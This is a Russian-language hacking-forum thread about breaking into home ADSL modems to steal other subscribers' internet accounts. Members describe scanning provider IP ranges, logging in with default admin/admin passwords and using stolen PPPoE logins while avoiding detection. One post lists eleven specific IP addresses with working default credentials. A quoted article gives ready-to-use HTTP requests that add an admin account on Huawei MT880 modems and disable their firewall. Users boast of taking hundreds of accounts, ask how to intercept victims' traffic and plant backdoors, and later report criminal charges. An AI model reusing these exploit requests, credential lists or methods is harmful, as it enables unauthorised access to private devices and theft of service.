Я эту фишку тоже проделывал, только ничего не нарушая, брал ипы друзей, заходивших на мой вирт серв (на компе) и проделывал описанную выше процедуру... вроде самому можно догадаться по логике как всё сделать =)

Видим мало интересного и что страница состоит из фреймов.
Я например делал проще, кстати писал это уже где-то... в браузере Opera тыкаешь правой кнопкой мыши на место около пасса (нужный фрейм) и там в меню будет нужная нам опция "Фрейм" - "Исходный код" =)
Вот :)
А так данный метод не катит у тех, кто в настройках модема включает встроенный файрвол или вирт сервер, то есть переадресатор своего IP на прогу-сервер... короче зайдя на модем, вы попадёте не туда, куда хотели =)
Да, над друзьями-ламерами я так прикалывался, например плюс к тому ещё сменив пасс на вход в модем))))
Этот же метод прокатил с девочкой из Беларусии, условия лишь: узнать IP, чтоб у жертвы стояло соединение PPPoE (роутером), если Bridge то не зайдёте ;)

Накой таким заниматься? Все равно трафиком восполлзоваться не удастся.
Хм =)
Лично у друга дома, я пробывал заходить в инет под моими данными - заходил ;)

...чтоб у жертвы стояло соединение PPPoE (роутером), если Bridge то не зайдёте ;)
По-умолчанию часто стоит режим роутер как раз, если бридж - то можно сам комп сканить на бажные сервисы...

По-умолчанию часто стоит режим роутер как раз, если бридж - то можно сам комп сканить на бажные сервисы...
Не наю, мои френды и я сами настраивали модемы, сам выбираешь режим соединения, вводишь данные...
канешна если хакать то найдётся путь =)

почему так????я взломал акк и пишет доступ запрещен,посмколько такие имя пользователя и пароль не доступны в этом домене ошибка 691 (что это такое помогите пожалуйста)

наверно акк занят, а наверно там денег нет =\

Или акк привязан к телефонной линии ;)

Или акк привязан к телефонной линии ;)
mby к Mac адресу сетевухи?

1) Если он занят к нему подключится, но инет не будет работать!
2) Пингуем того чувака и пишем arp -a и видим его MAC-адрес. Потом меняем мак-адрес через SMAC и всё

Ненене. Если сперли акк ЦентрТелекома (а я этих чертей знаю во многих регионах), то там привязка конкретно к линии. Так обдурить их сложно, да и к тому же все возможности для реализации этого способа у них есть. К mac может быть привязка разве что у провайдеров, к-рые разве что технически не могут или не хотят осуществлять привязку к телефонной линии.

З.Ы. Тому кто интересовался- я не из Липецка.

mby к Mac адресу сетевухи?


Нет! Как сказал kakoy_nafig_nik акк привязан к телефонному номеру, поэтому никак не получиться войти через другой номер, ИМХО...

Ненене. Если сперли акк ЦентрТелекома (а я этих чертей знаю во многих регионах), то там привязка конкретно к линии. Так обдурить их сложно, да и к тому же все возможности для реализации этого способа у них есть. К mac может быть привязка разве что у провайдеров, к-рые разве что технически не могут или не хотят осуществлять привязку к телефонной линии.

З.Ы. Тому кто интересовался- я не из Липецка.

Нет! Как сказал kakoy_nafig_nik акк привязан к телефонному номеру, поэтому никак не получиться войти через другой номер, ИМХО...
ADSL ВолгаТелеком работает всё номано при смене MAC адреса

Ну значит ВТ какбе намекает нам, что у нее привязка к телефонной линии. Они монополисты в вашей области по телефонной связи или их доля несоизмеримо большая по сравнению с другими? Значит привязка по линии. Это просто уже Лемма, не требующая доказательства :)

а как достать пароль с под соединения ппое?

а Слушайте могут ли как нибудь запалить???
если сидишь с другой учетки и так далее
а то у меня учетки всех какихта шишок по 3штуки я в шоке :O :O :O :O :O

а Слушайте могут ли как нибудь запалить???
если сидишь с другой учетки и так далее
а то у меня учетки всех какихта шишок по 3штуки я в шоке :O :O :O :O :O
Конечно...) На тя настучат телекомовцы и приедет к те отдел "К"

не на самом деле???? могут вычеслить как нибудь?

не на самом деле???? могут вычеслить как нибудь?
Конечно могут, если прочухают что-нибудь...

тема работает, проверял лично...
Если найдёшь пасс с безлимитным нетом,то можно понемногу его юзать.

По поводу привязки к линии - нету такого! Выходи откуда угодно.

у нас в все безлимитки вот и юзаю с одного на другой,ну все таки страшно вдруг что !! боюсьььь ))

у нас в все безлимитки вот и юзаю с одного на другой,ну все таки страшно вдруг что !! боюсьььь ))
Если хозяин акка обратиться к прову, то провайдер пробьёт очень быстро кто ?откуда? и когда?,далее передаёт дело потерпевшего со всеми логами в отдел. 100% найдут, при условии что будет обращение. А так сиди сколько влезет.

Да хз, мне кажется не стоит инет такова риска.....А то правда потом придут и заберут компитентные органы.

я узнавал! дак там говорят, значит вы камута дали логина попользоваться или ждите.... ))

Я второй день сижу с чужой безлимитки сижу ибо мою отключили за неуплату :rolleyes: ...
И ничего..нормально в принципе..пока что не спалили ))

d-link 2640 работает!
пароль по дефолту
admin admin
правда пришлось смотреть ие...опера и фаер не покатали...
хм...вот только одно интересно как ето зделать удаленно...у нас фактически ты получаеш динамически ип,и такого понятия как внутреная сеть нет...
будут у кого какие соображения ..как вычеслить ип роутера...?

Простите что всю тему не прочел. Прочел только стартовое сообщение.
Вот теперь объясните смысл этого, если на всех нормальных мопедах с WAN по умолчанию закрыт доступ к веб морде, ссш, телнет, только на зюхелях с старыми прошивками было все открыто? Куда тыкаться то собрались, если по умолчанию модем в режиме роутера отбивает все входящее, кроме проброшенных портов, UPnP(если включено).

Прочитав не один форум по этой теме для себя ничего конкретного не нашел. Так вот, в Smart Whois я ввел свой ip (62.ххх.ххх.ххх), он мне выдал диапазон ip моей сети (62.ххх.ххх.х - 62.ххх.ххх.хх). Потом просканил LanScope и там мне попались компы в основном с отрытыми портами на FTP и только один в модем которого можно было зайти через http сылку, ну я зашел, но там случился облом так как пароль отличался от стандартного. Дальше я посмотрел ip-адрес сервера, тоже вбил в Smart Whois и узнал диапазон (217.хх.ххх.х - 217.хх.ххх.ххх). В этом диапазоне повезло больше нашел парочку модемов со стандартными паролями. Они были настроены в режиме роутера, поэтому я стащил аккаунт этих пользователей. Это конечно хорошо и bнтернет практически у всех без лимитный. Да только не хочется что бы меня заловили на чужом логине и пароле. Так вот к чему была эта прелюдия. Хочется узнать как настроить тот чужой модем, что бы я всегда через него мог к интернету подключатся. Я конечно в этом еще очень слаб, если можно объсните пошагово.

Простите что всю тему не прочел. Прочел только стартовое сообщение.
Вот теперь объясните смысл этого, если на всех нормальных мопедах с WAN по умолчанию закрыт доступ к веб морде, ссш, телнет, только на зюхелях с старыми прошивками было все открыто? Куда тыкаться то собрались, если по умолчанию модем в режиме роутера отбивает все входящее, кроме проброшенных портов, UPnP(если включено).
Дата статьи: 20.12.2006, 13:10
Кроме того ты думаешь что все установленные мопеды куплены недавно или в них кто-нибудь обновляет прошивку?
По умалчанию доступ к вебморде был открыт... ;) P.S.тыкаться есть куда и сейчас... см. пост выше...

Настроить под себя модем без перепрошивки скорее всего не выйдет, да и рисковано, потому как хозяин может без инета и мопеда остаться...

lexa, ты скажешь что не реально вычислить кто чей ак юзает?

народ скажите пожалуста, вот я сижу на чюжих учётках точнее угнал 200 сотни учёток из них пользуюсь безпалева безлимитом при условии что юзер не всети, атс у нас древняя не цифровая дсллам на АТС фирмы huawei, провайдер наш лажовый это ВТ. Стоит не стоит сидеть на чюжих учётках как я читал сдесь многих поймали практически всех кто пробовал.

народ скажите пожалуста, вот я сижу на чюжих учётках точнее угнал 200 сотни учёток из них пользуюсь безпалева безлимитом при условии что юзер не всети, атс у нас древняя не цифровая дсллам на АТС фирмы huawei, провайдер наш лажовый это ВТ. Стоит не стоит сидеть на чюжих учётках как я читал сдесь многих поймали практически всех кто пробовал.


многих или всех? если кого-то не поймали значит можно. А стоит или нет, решать тебе. Умеешь маскироваться, и быть незаметным, сиди!

Захотят, всегда найдут (c) <free_kode>

p.s. чУжих пишется чере У

ну я думаю уже бы нашли если что то и было.

Что самое прикольное до сих пор конает. Только что просканил одну сеть адсл прова, и там несколько бажных модемов нарыл))

Умеешь маскироваться, и быть незаметным, сиди!

Захотят, всегда найдут (c) <free_kode>


А как тут вообще можно замаскироваться? По мойму не одни из известных способов тут не работает! Тем более на сколько мне известно на модеме не сохраняются адреса с которых к нему обращались, по этому вычислить можно тока на серв. прова. но там уже скорее всего нечего не поможет!

Провайдеры начали разработку ПО для "привязывания" логина и пасса к телефонной линии, так что пользуйтесь пока есть возможность,скоро не будет.

Я тут как то писал (29.12.2008, 08:03)
Что сижу мол второй день с чужой учетки...
В общем меня ЦТК за жопу взяли...2 месяца без инета сидел (((
Еле отвертелся...Сказали что если еще раз попадусь,То мене ппц...=)

Port 23,80 host: 200.160.1.3 login: admin password: admin
Port 23,80 host: 200.168.20.128 login: admin password: admin
Port 23,80 host: 200.168.21.15 login: admin password: admin
Port 23,80 host: 200.168.46.155 login: admin password: admin
Port 23,80 host: 200.168.59.22 login: admin password: admin
Port 23,80 host: 200.168.59.212 login: admin password: admin
Port 23,80 host: 200.168.64.89 login: admin password: admin
Port 23,80 host: 200.168.71.80 login: admin password: admin
Port 23,80 host: 200.168.83.252 login: admin password: admin
Port 23,80 host: 200.168.82.234 login: admin password: admin
Port 23,80 host: 200.168.88.236 login: admin password: admin В основном D-Link модемы, подключатся можно как через telnet так и через браузер. Это просто мне не нужно...

KPbIBe[D]Ko прогонище)))) тя так и так предупреждают или отключают... Или максимум модем банят... ну ни как за жопу не брали)) кстати охота узнать как Мультинекс фигнуть так же учетки достать...... там учетки приколььней тем что с них денег на телу можна переводить))))))

Самая тема что вы сидите ночью и без палива. и все ок будет грю вам))

проблемка, вообщем сетка состоит из 30 компов и 3 модемов айпи адреса всех модемов знаю, но заходит на страничку там инфа о модеме но прав ни каких нет, вот ссылка на картинку http://pic.ipicture.ru/uploads/090511/YsVFTHSWlB.jpg люди помогите взломать

Знаю ещё один ip адрес модема но его не видно в сети никакими сканерами и подключиться к нему тоже невозможно через телнет, и браузер((

Гыыыыыыыы
Лол
У нормальных людей модем бриджом работает =)
Нах нат раздавать с модема ?
баян не в обиду автор =)

С чего ты это взял? Натить на модеме нах? а нах ставить отдельный сервак? Поднял фильтр и проблем не знаешь. я не думаю(вернее я знаю), что на модем сильно не будет влиять перегон с ATM на TCP/IP. Это сугубо вопрос вкуса.

Нэ просто работал с технологией атм и конструировал дсл модем)
Кстати статья наркоманская - куда проще ловить все это дело по телнету - веб морда обычно зашарена.

Нэ просто работал с технологией атм и конструировал дсл модем)
Кстати статья наркоманская - куда проще ловить все это дело по телнету - веб морда обычно зашарена.
По дефалту обычно вебморда открыта (ну не во внешку но во внутрь уж точно) а так согласен, можно и по телнету, хотя я теперь все сервисы с модема во внешку всегда закрываю. ;)

По дефалту обычно вебморда открыта (ну не во внешку но во внутрь уж точно) а так согласен, можно и по телнету, хотя я теперь все сервисы с модема во внешку всегда закрываю. ;)
Ненене для локалок у нас провайдер открывает только несколько портов - фтп, 80, GRE, VPN и доступ по теленету через ван. Локальные админы курят бамбук - так что никакой прямой перебор не поможет. И впринципе я их полностью поддерживаю.

Ненене для локалок у нас провайдер открывает только несколько портов - фтп, 80, GRE, VPN и доступ по теленету через ван.
Не понял это где? провайдер открывает несколько портов? У меня на внешнем интерфейсе внешний реальный IP а внутренний смотрит в домашнюю локалку из 2 компов. Какие порты мне нужны те я и переадресую на нужный комп с внешнего IP на локальный IP:Port

Не понял это где? провайдер открывает несколько портов? У меня на внешнем интерфейсе внешний реальный IP а внутренний смотрит в домашнюю локалку из 2 компов. Какие порты мне нужны те я и переадресую на нужный комп с внешнего IP на локальный IP:Port
Эммм я же написал - для локалок. В локалках модем натит весь трафик поступающий на него в сеть прова. Тоесть через модемчик идет подключение к впн серверу + бесплатные ресурсы. Ну и доступ к модему есть у супорта - для того чтобы хитрожопые админы не забивали нат торентами и не мешали раздавать инет - они доступа на модем не имеют. А раз не имеют - то все что не разрешено, то запрещено. Встроенный фильтр на зухелях обрабатывает пакеты еще на прероутинге, так что нагрузки на модем никакой + сразу отпадает проблема с вирусней.

Зайдя в модем - что можно сделать?

многое можно сделать
например настроить модем (скажем редирект портов, на хосты за модемом) тем самым проникнуть в сеть..
ну а там, что фантазия позволит :)

многое можно сделать
например настроить модем (скажем редирект портов, на хосты за модемом) тем самым проникнуть в сеть
Как?
Модем - Acorp
Кстити, скорее всего там и локалки нет никакой - модем к компу подключен
Ах да, акк и пасс прова - получил

Настроек туча
UPnP


SNTP


SNMP


IP Account


TR-069


Port Forwarding

IP Filters

LAN Clients

LAN Isolation

TR-068 WAN Access


Bridge Filters

Dynamic DNS Client

IGMP Proxy


Static Routing

Dynamic Routing

Policy Routing

Ingress

Egress

Shaper

Web Access Control

SSH Access Control

Как этим можно воспользоваться?

Эммм я же написал - для локалок. В локалках модем натит весь трафик поступающий на него в сеть прова. Тоесть через модемчик идет подключение к впн серверу + бесплатные ресурсы. Ну и доступ к модему есть у супорта - для того чтобы хитрожопые админы не забивали нат торентами и не мешали раздавать инет - они доступа на модем не имеют. А раз не имеют - то все что не разрешено, то запрещено. Встроенный фильтр на зухелях обрабатывает пакеты еще на прероутинге, так что нагрузки на модем никакой + сразу отпадает проблема с вирусней.

а чо это за локалка где есть модем который натит весь трафик поступающий на него в сеть прова(интересно на сколько порт поднялся)
а хитрожопые админы-это типа как серый совет из вавилона 5 ?
сори может чо не догнал...

а чо это за локалка где есть модем который натит весь трафик поступающий на него в сеть прова(интересно на сколько порт поднялся)
а хитрожопые админы-это типа как серый совет из вавилона 5 ?
сори может чо не догнал...

Ну как тебе сказать - у нас через модемы идет конект к впн серверу. + доступ к ресурсам прова - типа там сайт для оплаты, итд и тп. на все остальное по правилам - стоят фильтры. Если дохера лить - нат забиваеться - ТП банит ип с которого стабилно забивается нат. Если админ имел бы доступ - его бы было довольно сложно ограничить. PS линия на нашем модемчике поднялась на 18 мегабит входящих при 16 Децибелах. Так что линия вроде ничего.

Зайдя в модем - что можно сделать?
Порт маппинг тебе в помощь.

Вот видео (http://hacker-pro.net/forum/downloads.php?do=file&id=95) по теме!!!

поднимаю старую тему,тк у меня такая проблемма,сканю сеть,ip в браузер,не открывает =/

Я узнал впринципе как ломать пароли и логины других...
Но даже если я смогу подключится с их данными,то будет ошибка...
У нас в сети логин привязывают к телефонной линии(тел. номеру)...Я где читал что надо"ломаешь модем, поднимаешь на нем роутер, который настраиваешь на прокси провайдера, у себя прописываешь как шлюз IP взломанного модема...готово"...
КАК ЭТО СДЕЛАТЬ?
Заранее спасибо)

1. А если изменить имя или пароль прова, тот человек подключиться уже не сможет?
2. Как узнать тариф?

Сейчас во многих областях России (да и за пределами) частенько используют подключение пользователей через телефонную линию при помощи АДСЛ соединений. Для этого всего лишь нужно: провайдер, использующий данную технологию (например: Телеком, Домолинк); телефон дома (естественно подключенный к ГТС и работающий) и ADSL модем (например: D-Link, Zuxel, Huawei и т.д.). Предположим что мы подключились.... Теперь перейдем от общего к частному! На текущий момент нас больше интересует ADSL модем фирмы Huawei марки MT880. У данного модема встроенная конфигурация имеет недостатки, которые позволяют пользователям LAN получать несанкционированный полный доступ к устройству. Наши действия следующие:

1) Добавление прав администратора:
_http://192.168.1.1/Action?user_id=jerome&priv=1&pass1=jerome&pass2=jerome&id=70

2) Блокируются firewall/anti-DoS... характеристики:
_http://192.168.1.1/Action?blacklisting_status=1&bl_list=10&attack_status
=0&dos_status=0&id=42&max_tcp=25&max_icmp=25&max_host=70

3) Добавляем MAC address в whitelist:
_http://192.168.1.1/Action?insrcmac66=123456789123&inblocksrcmac66=1&insr
cmac67=000000000000&inblocksrcmac67=1&insrcmac68=000000000000&inblocksrc
mac68=1&insrcmac69=000000000000&inblocksrcmac69=1&insrcmac70=00000000000
0&inblocksrcmac70=1&insrcmac71=000000000000&inblocksrcmac71=1&insrcmac72
=000000000000&inblocksrcmac72=1&insrcmac73=000000000000&inblocksrcmac73=
1&insrcmac74=000000000000&inblocksrcmac74=1&insrcmac75=000000000000&inbl
ocksrcmac75=1&insrcmac76=000000000000&inblocksrcmac76=1&insrcmac77=00000
0000000&inblocksrcmac77=1&insrcmac78=000000000000&inblocksrcmac78=1&insr
cmac79=000000000000&inblocksrcmac79=1&insrcmac80=000000000000&inblocksrc
mac80=1&insrcmac81=000000000000&inblocksrcmac81=1&id=104

4) Добавляем IP address чтобы пропускал файервол:
_http://192.168.1.1/Action?ip_1=192&ip_2=168&ip_3=1&ip_4=2&mask_1=255&mask_2=255&mask_3=255&mask_4=255&gateway_1=192&gateway_2=168&gateway_3=1&gateway_4=1&id=7

Вуаля!

P.S. Данная статья предоставлена в общеобразовательных целях и автор не несет за использование этих материалов никакой ответственности.

читать 24 страници лень. Объясняю суть проблемы:
У меня провойдер таков, что на внешку у меня скорость 256 кбит., а внутри сети 8 мбит. Так вот. Если я с внешки скачиваю - 10 ГБ - провайдер обрезает скорость до 32 кбит. И скорость востанавливается в след месяце.
Как бы сделать так, чтобы после 10 гб выкачаного с внешни, я мог использовать взломаную машину в качестве прокси?

чтоб использовать машину в качестве прокси нужно установить на нее прокси)
Юзай учетную запись от инета, которую найдешь в самом модеме.

прошу прощения, дабы уберечься, спрошу, по каким признакам можно определить взлом и как с ним бороться и как его избежать, ибо мне кажется, что с меня кто-то сидит (инет раза в 2 хуже, причём временами ощутимо), модем D-link, соединение через PPoE

Возможно, я ошибаюсь, но сидеть под одной учоткой с 2-х компов на DSL инете невозможно.

возможно, но сижу с одного модема одновременно на компе и ноуте через ЛАН

ээ ну вообще включи фаервол на мопеде. Чтоб внешние попытки коннекта к нему отсылались лесом. И вообще ещё зависит от твоего провайдера.

сбросить и перенастроить модем
вбить нормальный пасс
сменить автоизацию у прова

Можно ли как-нить узнать тариф(безлимит, лимит)?

вот я получил доступ к настройкам можема ? че делать чтобы каким то образом перехватить трафик жертвы ? короче как-то получить доступ к файловой системе компа или просто стырить пассы от мейла и др. сервисов ?

У нас в сети логин привязывают к телефонной линии(тел. номеру)...Я где читал что надо"ломаешь модем, поднимаешь на нем роутер, который настраиваешь на прокси провайдера, у себя прописываешь как шлюз IP взломанного модема...готово"...
КАК ЭТО СДЕЛАТЬ?
Заранее спасибо)

Люди помогите! У меня ADSL от ютела, листок с паролем от учетки патеряли, сейчас нужен пароль срочно, ютеловцы отказываются дать мне пароль!!! Просят денег! Модем "интеркросс" ICxDSL 5633 E , метод из этой статьи к моему модему не подходит(( вот исходный код html той страницы где пароль под звездочками <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<META HTTP-EQUIV="pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache, must-revalidate">
<META HTTP-EQUIV="expires" CONTENT="Wed, 26 Feb 1997 08:21:57 GMT">
<title>ADSL Router</title>
<link href="/admin/main.css" rel="stylesheet" type="text/css">
</head>

<frameset rows="135,*" cols="*" framespacing="1" frameborder="no" border="0" bordercolor="#3300FF">
<frame src="/statusMenu.asp" name="topFrame" scrolling="NO" noresize >
<frameset rows="*" cols="16%,*" framespacing="1" frameborder="no" border="0" bordercolor="#3300FF">
<frame src="/menu.asp" name="leftFrame" id="lframe" scrolling="NO" noresize>
<frame src="/status_sc.asp" name="mainFrame">
</frameset>
</frameset>
<noframes></noframes>
</html> что тут нужно зделать? либо дайте ссыль на статью про него... Заранее спасибо!

У нас в сети логин привязывают к телефонной линии(тел. номеру)...Я где читал что надо"ломаешь модем, поднимаешь на нем роутер, который настраиваешь на прокси провайдера, у себя прописываешь как шлюз IP взломанного модема...готово"...
КАК ЭТО СДЕЛАТЬ?
Заранее спасибо)
Бляяяя.... я в истерике.... давно такого не читал... чет у меня сложилось впечатление , что тут мало кто понимает ,как работает ДСЛ. Очень жаль. Технология можно сказать эпохальная(хоть и отмирающая).

Вобщем - есть замечательные устройства, называемые дсламами - что это такое - http://jfgi.ru/. От каждого дслама - идет туева куча медных пар, которые идут на кросс-панель(такая хрень куда втыкаются 4 провода а выходит 1 пара). К этой же кросс-панели подводится ваша телефонная линия. Таким образом получается, что по вашему телефонному кабелю идет ваш старый аналоговый/цифровой низкочастотный телефонный канал + высокочастотный провайдерский - фактически дополнительный участок АТМ сети (что это такое - искать по вышеприведенной ссылке). Эти данные - которые поступают по атм каналу - запихиваются в обычный влан. Так что если админ на провайдере не полный кретин - получить доступ к "прокси провайдера " никто не сможет.

PS С удовольствием поделюсь знаниями по DSL технологиям - если вдруг кому интересно).

Здрасте, прочитал аж в плоть до 23 страницы, последние 2 не асилил :D

Вопрос, вот у меня пров ВТК... Сижу сейчас с учётки соседа, но своего телефона нет, так что телефон тош соседа :D ......
Как мне определить, есть привязка или нет? Модем соседа Huawei мой стаааренький ZTE ZXDSL........

раньше не было привязки логина к мак адресу модема, ломанул один логин (молодой был) и не подумал, что можно с БИСА (АДСЛ подключение) взять логи с каких маков заходил и пробить их, налазил парнишке на 16к, отделался штрафом в 2.5к =)

какой диапозон забивать?
провайдер таттелеком,летай!

Forser допустим у тебя ип 172.1.62.16.... вбивай от 172.1.62.0 до 172.1.62.255 это точно, а так узнай какие у твоего прова диапазоны.

По whois можно узнать дмапазоны провайдера, на офф. сайте прова, по dns-серверам, по нейм-серверам и т. д. Проще по whois.

X-3 чёт я на офф сайтах не видел айпишнеГи........

А я в Америке не был ни разу, но ты знаешь, как-то вот поверил в ее существование :)))

как-то встречалось мне описание модемных пулов у прова, так что есть такая штука. Но еще раз: проще: whois )))))))

спасиб за статью, очень помогла))
также огромное мега спасибо,как раз купил себе новый модемчик акорд и поставил свой логин и пасс от повайдера,теперь мне не надо запускать ярлык с рабочего стола ,а захожу теперь сразу ;) ;) ;)

Привет всем! Кто может помочь взломать модем от Zyxel серии Prestige, в котором стандартный пароль в большинстве случаев изменен?

Парни, почему не получается у меня зайти на страницу авторизации большенства модемов? При сканировании прогрой LanScope, находит довольно много IP адресов в сети, но единственный адрес на который получается зайти это с окончанием ххх.ххх.1.1 все остальные браузер открыть не может. Что я делаю не так?

Парни, почему не получается у меня зайти на страницу авторизации большенства модемов? При сканировании прогрой LanScope, находит довольно много IP адресов в сети, но единственный адрес на который получается зайти это с окончанием ххх.ххх.1.1 все остальные браузер открыть не может. Что я делаю не так?

Скорее всего для внешней сети Web-интерфейсы модемов прикрыты. Тот адрес случайно не 192.168.1.1 Если да, то это скорее всего твой модем (шлюз).

В настройках модема во вкладке Remote Management Control стоит Lan Only..

Привет всем! Кто может помочь взломать модем от Zyxel серии Prestige, в котором стандартный пароль в большинстве случаев изменен?
Брут тебе поможет.

Подскажите дипазон IP-адресов Таттелекома!
Очень надо!

Вас забанили на гугле?
Ссылка (http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=Tattelecom&submit.x=0&submit.y=0&submit=Search)
А теперь, собственно, вопрос- а зойчем?

Вас забанили на гугле?
Ссылка (http://www.db.ripe.net/whois?form_type=simple&full_query_string=&searchtext=Tattelecom&submit.x=0&submit.y=0&submit=Search)
А теперь, собственно, вопрос- а зойчем?
Благодарю!Очень надо было!

Скорее всего для внешней сети Web-интерфейсы модемов прикрыты. Тот адрес случайно не 192.168.1.1 Если да, то это скорее всего твой модем (шлюз).

Да, адрес 192.168.1.1, но я точно знаю что это не мой модем. Причём заходя на этот адрес попадаю то на один модем, то на другой, то на третий. А вот по другим IP, которые находит LanScope, ни в какую.

В настройках модема во вкладке Remote Management Control стоит Lan Only..

Не смог найти эту вкладку :( У меня модем Акроп LAN122.

вопрос такой вот есть, допустим реально добавить и в найтроскахмодмеа где-то что-то вроде 192.168.1.1 и порт(например ИП бэкдора?) допустим чтобы можно каким-то образом либо подключиться или прочее?

более подробн плз
"Ну а что делать в настройке ADSL-модема, я думаю объяснять не надо, можно сделать например переадресацию пакетов (настройка NAT) по всем протоколам и портам с внешнего IP на внутренний и ломать"
1)есть статьи?
2)чем принимать такие данные?
3)можно прицепить бекдор?

Плз подскажите что делать если после скана подставляешь любой из появихшився ip пишет: не найден сетевой путь?

Плз подскажите что делать если после скана подставляешь любой из появихшився ip пишет: не найден сетевой путь?
это статья древняя, этот метод сейчас уже неактуален.

ovechkin Adsl, еще тем летом помоему, привязал учетки к домашним телефонам, теперь с чужой учетки в инет не выйдешь.

ovechkin Adsl, еще тем летом помоему, привязал учетки к домашним телефонам, теперь с чужой учетки в инет не выйдешь.
Аналогично. Только у меня привязали давно.

ovechkin Adsl, еще тем летом помоему, привязал учетки к домашним телефонам, теперь с чужой учетки в инет не выйдешь.
В зависимости от провайдера. Вот мой провайдет логин и пароль не проивязан не mac-адресу, не ном. дом телефона.... . Но если ты будешь сидеть под другим паролем и логином, тебя можно будет спокойно пропалить, ну если сис. админы в твоей подсетке есть :D

А я вот тут сижу сканирую диапазон и у одного адреса отобразились 2 папки:
D
SharedDocs

Что это такое? И как защититься чтоб мой пароль не узнали?

А я вот тут сижу сканирую диапазон и у одного адреса отобразились 2 папки:
D
SharedDocs

Что это такое? И как защититься чтоб мой пароль не узнали?
Это расшареные документы, папка вроде называется "Общие документы", кароче файлы доступные для локальных пользователей.

Зайди в настройки модема, логин admin, пароль по умолчанию помоему тоже admin или 1234, я уж щас не помню.
В зависимости от фирмы мопеда, Huawei, D-Link и т.п...
Полазий по менюшкам в нем и смени.

В зависимости от провайдера. Вот мой провайдет логин и пароль не проивязан не mac-адресу, не ном. дом телефона.... . Но если ты будешь сидеть под другим паролем и логином, тебя можно будет спокойно пропалить, ну если сис. админы в твоей подсетке есть :D
Неплох, я только пол года успел попаразитировать потом лафу прикрыли, сделали абонентам привязку к дом. телу.
Кстати чо за пров у тя, и какой город? Ответь в личку еси нет необходимости этого скрывать.
Могу одолжить с десяток учеток ТП Мечтай :rolleyes:

Помогите, Вопрос такой, оч нужен сканер, чтоб в результатах показывал модель найденного роутера\модема, модель обычно пишется в окошке ввода логина пароля (admin\admin), например D-link 500T или MT880 ит.д существует такой сканер под WINDOWS? желательно многопоточный

народ нестоит взламывать модемы вычаслят нефик делать, сам попался на этом угнал больше 260 учёток и кого только там нет в этих учётках, и ментов, и судей, прокурор, адвокат даже есть.
предьявили обьвинение в статье 272 часть 1, и 165. вот скоро суд будет. Посмотрим что будет но думую нечего страшного.
интересно есть люди которыые за этужу статью осудили?

Да кстатье провайдер ВТ был, потом сразуже из-за меня ввели во всей области привязку к порту DSLAM. Дал подписку о невыезде, потом ещё про меня написали в газете молодой хакер взломал хотел взломать банк, и было угнано ну кароч прославился на всю область, но на счёт банка да было дело попался сбер банк россии в учётках. позже дам ссылку.

вот написали в газете про меня и только про меня http://ulpressa.ru/news/2010/02/18/article108050/